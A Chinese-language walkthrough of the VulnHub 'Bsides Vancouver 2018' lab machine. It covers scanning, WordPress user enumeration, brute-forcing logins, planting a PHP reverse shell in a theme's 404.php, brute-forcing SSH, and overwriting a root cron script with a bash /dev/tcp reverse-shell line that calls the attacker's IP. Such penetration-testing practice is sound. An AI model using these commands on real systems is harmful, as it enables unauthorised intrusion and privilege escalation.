Vulnhub-Bsides Vancouver 2018

0x00 准备

靶机下载：

https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/#release

双击ovf文件，导入到Vmware中，选择NAT模式

Kali：192.168.194.140

0x01 测试

首先nmap扫描同一C段：nmap 192.168.194.1/24，找到目标机器IP:192.168.194.143，且开放21、22、80端口。

访问Web页面（80端口）

使用dirsearch.py脚本进行目录扫描：

python dirsearch.py -u “http://192.168.194.143/” -e *

访问robots.txt，得到一个弃用的Wordpress的路径地址，访问首页看到了作者：john，得到一个用户名。

接着使用dirsearch.py进行扫描：

python dirsearch.py -u “192.168.194.143/backup_wordpress/” -e *

访问/readme，可以看到该站的版本为4.5一个很老的版本，现在最新已经出5.4了，这种老站已经相对很少了，但是对付老站就可以掏出神器wpscan进行漏扫。

root@kali:~# wpscan –url http://192.168.194.143/backup_wordpress/ –enumerate u

枚举出两个可用用户admin、john

访问：http://192.168.194.143/backup_wordpress/wp-login.php进行抓包爆破后台密码，载入一个常用密码字典即可。网上搜罗，最终得到john的密码是enigma

进入后台后选择“外观”->“编辑”->404 模板.php， 修改404.php文件写一个反弹Shell的PHP木马，可用Kali中自带的，路径： /usr/share/webshells/php/php-reverse-shell.php 将IP写为Kali的IP，端口为Kali端用nc监听端口。

在下方点击“Update File”更新即可，然后访问指定路径：http://192.168.194.143/backup_wordpress/wp-content/themes/twentysixteen/404.php

该路径可以看出是右边两个红圈的名字，当处于加载转动状态，回到Kali监听端即可看到反弹回Shell

接着利用python做一个交互式的TTL的终端，命令：python -c 'import pty; pty.spawn("/bin/bash")'，查看当前权限是www-data，然后查看下可以登录该机器的用户有哪些。

其中存在几个拥有bash权限的用户，利用hydra尝试爆破下SSH密码，最终只得到anni的密码为princess

SSH连接登录：ssh anne@192.168.194.143 随后提权到root用户，拿到flag

第二种方法：查看定时任务，存在一个以root用户定时执行的任务

查看原有的cleanup是以一个清除Apach日志记录的，将其重新写入，注意这样拿到的Shell没有rm和vi命令，只能通过echo进行写入

echo ‘#!/bin/bash’ > cleanup

echo ‘bash -i >& /dev/tcp/192.168.194.140/4444 0>&1’ >> cleanup

然后快捷键【Ctrl】+【Shift】+【T】新开一个终端，监听4444端口，一会就收到root用户的Shell了。